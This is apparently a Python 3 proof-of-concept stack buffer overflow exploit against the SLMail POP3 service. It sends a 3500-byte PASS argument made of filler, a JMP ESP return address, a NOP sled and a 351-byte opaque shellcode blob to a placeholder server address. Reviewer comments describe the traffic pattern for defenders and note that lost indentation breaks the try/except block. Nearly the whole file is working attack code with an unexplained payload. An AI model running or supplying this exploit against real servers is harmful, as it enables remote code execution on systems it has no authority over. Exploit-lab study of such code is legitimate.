SLMail overflow in python3
#!/usr/bin/python3
# Proof-of-concept stack overflow against a POP3 service (SLMail, per the gist title).
# One PASS command is sent whose argument is a fixed 3500-byte buffer laid out as:
# 2606 filler bytes, a 4-byte address the author labels JMP ESP, a 16-byte NOP sled,
# the 351-byte shellcode, then filler up to 3500 bytes.
# From a defender's point of view the observable is the PASS line itself: a ~3.5 KB
# argument made of long runs of 0x41 ('A'), 0x90 and 0x43 ('C') around an opaque blob,
# where a normal POP3 password is a few dozen bytes at most.
import socket
#Python 2 is dead/on borrowed time, write exploits in Python3 FTW
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)  # plain TCP client socket
#Replace shellcode with your own but prepend b" to hex strings
# 351 bytes (23 lines x 15 bytes + 6); the literal 351 in the padding arithmetic
# below must be kept in sync with this length if the blob is replaced.
shellcode = (
b"\xda\xc3\xd9\x74\x24\xf4\x5f\x33\xc9\xbd\xc6\xe9\x1f\xf7\xb1"
b"\x52\x31\x6f\x17\x03\x6f\x17\x83\x29\x15\xfd\x02\x49\x0e\x80"
b"\xed\xb1\xcf\xe5\x64\x54\xfe\x25\x12\x1d\x51\x96\x50\x73\x5e"
b"\x5d\x34\x67\xd5\x13\x91\x88\x5e\x99\xc7\xa7\x5f\xb2\x34\xa6"
b"\xe3\xc9\x68\x08\xdd\x01\x7d\x49\x1a\x7f\x8c\x1b\xf3\x0b\x23"
b"\x8b\x70\x41\xf8\x20\xca\x47\x78\xd5\x9b\x66\xa9\x48\x97\x30"
b"\x69\x6b\x74\x49\x20\x73\x99\x74\xfa\x08\x69\x02\xfd\xd8\xa3"
b"\xeb\x52\x25\x0c\x1e\xaa\x62\xab\xc1\xd9\x9a\xcf\x7c\xda\x59"
b"\xad\x5a\x6f\x79\x15\x28\xd7\xa5\xa7\xfd\x8e\x2e\xab\x4a\xc4"
b"\x68\xa8\x4d\x09\x03\xd4\xc6\xac\xc3\x5c\x9c\x8a\xc7\x05\x46"
b"\xb2\x5e\xe0\x29\xcb\x80\x4b\x95\x69\xcb\x66\xc2\x03\x96\xee"
b"\x27\x2e\x28\xef\x2f\x39\x5b\xdd\xf0\x91\xf3\x6d\x78\x3c\x04"
b"\x91\x53\xf8\x9a\x6c\x5c\xf9\xb3\xaa\x08\xa9\xab\x1b\x31\x22"
b"\x2b\xa3\xe4\xe5\x7b\x0b\x57\x46\x2b\xeb\x07\x2e\x21\xe4\x78"
b"\x4e\x4a\x2e\x11\xe5\xb1\xb9\x14\xf1\xb9\x7a\x41\x07\xb9\x7d"
b"\x2a\x8e\x5f\x17\x5c\xc7\xc8\x80\xc5\x42\x82\x31\x09\x59\xef"
b"\x72\x81\x6e\x10\x3c\x62\x1a\x02\xa9\x82\x51\x78\x7c\x9c\x4f"
b"\x14\xe2\x0f\x14\xe4\x6d\x2c\x83\xb3\x3a\x82\xda\x51\xd7\xbd"
b"\x74\x47\x2a\x5b\xbe\xc3\xf1\x98\x41\xca\x74\xa4\x65\xdc\x40"
b"\x25\x22\x88\x1c\x70\xfc\x66\xdb\x2a\x4e\xd0\xb5\x81\x18\xb4"
b"\x40\xea\x9a\xc2\x4c\x27\x6d\x2a\xfc\x9e\x28\x55\x31\x77\xbd"
b"\x2e\x2f\xe7\x42\xe5\xeb\x17\x09\xa7\x5a\xb0\xd4\x32\xdf\xdd"
b"\xe6\xe9\x1c\xd8\x64\x1b\xdd\x1f\x74\x6e\xd8\x64\x32\x83\x90"
b"\xf5\xd7\xa3\x07\xf5\xfd" )
# 5F4A358F FFE4 JMP ESP
# The address above written little-endian (bytes reversed), 4 bytes.
jmpespaddr = b'\x8f\x35\x4a\x5f'
# 2606 filler bytes placed before the address; the .encode()/bytes() pair is
# redundant (b"A" * 2606 is the same value).
prepad = bytes(("A" * 2606).encode())
nopsled = b'\x90' * 16 #accidentally sent \x60, because typo, and it still worked, weirdly enough.
# Trailing filler so the whole PASS argument is exactly 3500 bytes:
# 3500 - prepad - address - nopsled - shellcode.
padding = bytes(("C" * (3500 - 2606 - 4 - 16 - 351)).encode())
buffer = prepad + jmpespaddr + nopsled + shellcode + padding  # 3500 bytes in total
# NOTE(review): the try/except bodies below carry no indentation as pasted, so the
# file is a SyntaxError as shown; presumably the indentation was lost in the paste.
try:
print("\nSending not very nice buffer...")
connect=s.connect(('10.10.10.10',110)) #Replace IP with pop3 server IP; connect() returns None, so this name is never used
s.recv(1024)  # server banner, discarded
s.send(b'USER operator\r\n')
s.recv(1024)  # USER response, discarded
s.send(b'PASS ' + buffer + b'\r\n')  # the oversized PASS argument goes out here
print("\nDone!")
s.close()
# Catches every exception from the whole exchange, not only connect(), so the
# "Could not connect" message is also printed for recv()/send() failures; the
# socket is not closed on this path.
except Exception as e:
print("Could not connect to POP3")
print(e)